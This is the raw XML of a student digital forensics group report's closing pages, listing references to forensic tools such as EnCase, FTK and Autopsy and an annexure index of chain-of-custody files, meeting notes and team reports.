    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[29] OpenText, "EnCase Forensic," [online] Available: https://www.opentext.com/products/encase-forensic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[30] Exterro, "Forensic Toolkit," [online] Available: https://www.exterro.com/forensic-toolkit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[31] Wireshark, [online] Available: https://www.wireshark.org/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[32] Cellebrite, "UFED," [online] Available: https://cellebrite.com/en/ufed/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[33] Oxygen Forensics, [online] Available: https://oxygenforensics.com/en/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[34] The Sleuth Kit &amp; Autopsy, [online] Available: </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.sleuthkit.org/autopsy/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[35] Cyber Insight, "Forensic Analysis Tools: Comparing FTK and Autopsy," 2023.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[36] H. Tara and A. Mishra, "A Comparative Study of Digital Forensic Tools," Journal of Punjab Academy of Forensic Medicine and Toxicology, vol. 21, no. 1, pp. 97-104, 2021, DOI: 10.5958/0974-083X.2021.00016.9.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cqsmriquh0sy" w:id="107"/>
      <w:bookmarkEnd w:id="107"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Annexures</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ALl of these files can be found in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">OneDrive Folder</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald Medium" w:cs="Oswald Medium" w:eastAsia="Oswald Medium" w:hAnsi="Oswald Medium"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_lnun9l9z47zw" w:id="108"/>
      <w:bookmarkEnd w:id="108"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chain of Custody</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Team C - Task 3 - Receiver.docx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Team C - Task 3 - Sender.docx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Team C - Task 4.docx</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald Medium" w:cs="Oswald Medium" w:eastAsia="Oswald Medium" w:hAnsi="Oswald Medium"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_n6mnked4l65m" w:id="109"/>
      <w:bookmarkEnd w:id="109"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Minutes of Meeting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Meeting Notes - 1.docx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Team Discussions/Meeting Notes.docs</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald Medium" w:cs="Oswald Medium" w:eastAsia="Oswald Medium" w:hAnsi="Oswald Medium"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1s7cn7og21ct" w:id="110"/>
      <w:bookmarkEnd w:id="110"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Video Presentation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Group C - Task 3 - Video Presentation.mp4</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald Medium" w:cs="Oswald Medium" w:eastAsia="Oswald Medium" w:hAnsi="Oswald Medium"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9o3co6bklrs6" w:id="111"/>
      <w:bookmarkEnd w:id="111"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Data Collection Report.pdf</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald Medium" w:cs="Oswald Medium" w:eastAsia="Oswald Medium" w:hAnsi="Oswald Medium"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kyvr99ez58z3" w:id="112"/>
      <w:bookmarkEnd w:id="112"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Team Reports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Group C - Task 3 - ACCA7031 - Digital Forensics Analysis.docx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Group C - Task 4 - ACCA7031 - Mobile Digital Forensics Analysis.docx</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald Medium" w:cs="Oswald Medium" w:eastAsia="Oswald Medium" w:hAnsi="Oswald Medium"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_70v5obwforo5" w:id="113"/>
      <w:bookmarkEnd w:id="113"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Google Sheet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Google Sheet - Task 3 &amp; 4.xlsx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001ED">
      <w:pPr>
        <w:ind w:left="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E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId14" w:type="default"/>
      <w:footerReference r:id="rId15"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ourier New"/>
  <w:font w:name="Arial"/>
  <w:font w:name="Consolas"/>
  <w:font w:name="Oswald Medium">
    <w:embedRegular w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId1" w:subsetted="0"/>
    <w:embedBold w:fontKey="{00000000-0000-0000-0000-000000000000}" r:id="rId2" w:subsetted="0"/>
  </w:font>
  <w:font w:name="Oswald">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F">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
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>
        <w:spacing w:line="276"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jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Oswald" w:cs="Oswald" w:eastAsia="Oswald" w:hAnsi="Oswald"/>
      <w:b w:val="1"/>
      <w:color w:val="1c4587"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Oswald Medium" w:cs="Oswald Medium" w:eastAsia="Oswald Medium" w:hAnsi="Oswald Medium"/>
      <w:color w:val="1155cc"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Oswald" w:cs="Oswald" w:eastAsia="Oswald" w:hAnsi="Oswald"/>
      <w:color w:val="3c78d8"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>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go-transcribe.com/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://uowtsd-my.sharepoint.com/:f:/r/personal/2220277_student_uwtsd_ac_uk/Documents/Team%20Shared%20Folder%20-%20ACCA7031%20-%20Digital%20Forensics%20Analysis?csf=1&amp;web=1&amp;e=2h0kXa" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sleuthkit.org/autops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5.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OswaldMedium-regular.ttf"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/OswaldMedium-bold.ttf"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Oswald-regular.ttf"/><Relationship Id="rId4"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